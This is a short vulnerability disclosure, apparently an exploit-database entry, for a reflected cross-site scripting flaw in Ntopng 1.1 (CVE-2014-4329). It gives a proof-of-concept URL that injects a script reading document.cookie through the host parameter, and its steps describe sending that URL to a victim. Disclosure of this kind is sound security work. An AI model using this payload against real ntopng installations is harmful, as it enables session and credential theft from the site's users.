# Exploit Title: Cross Site Scripting Vulnerability in Ntop-NG (CVE-2014-4329)
# CVE : CVE-2014-4329
# Date: 2 July 2014
# Exploit Author: Madhu Akula
# Vendor Homepage: http://www.ntop.org/
# Software Link: http://www.ntop.org/get-started/download/
# Version : Ntopng 1.1
# Severity: High
# Tested on: Ubuntu & Windows
# URL: 
http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script>


# Issue Details :

Ntopng is vulnerable to cross-site scripting, caused by improper 
validation of user-supplied input by the host_details.lua script. A 
remote attacker could exploit this vulnerability using the host 
parameter in a specially-crafted URL to execute script in a victim's Web 
browser within the security context of the hosting Web site, once the 
URL is clicked. An attacker could use this vulnerability to steal the 
victim's cookie-based authentication credentials.


# Steps to replicate: (POC)

1. Replace the domain with the host and send this to Victim (or) Open it

http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script>

I attached a screenshot also for POC


# References :

http://www.securityfocus.com/bid/66456
https://svn.ntop.org/bugzilla/show_bug.cgi?id=379
http://xforce.iss.net/xforce/xfdb/92135
http://cve.circl.lu/cve/CVE-2014-4329
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4329
http://cxsecurity.com/cveshow/CVE-2014-4329/
http://www.secuobs.com/revue/news/519877.shtml


Madhu Akula
Information Security Researcher
https://www.twitter.com/madhuakula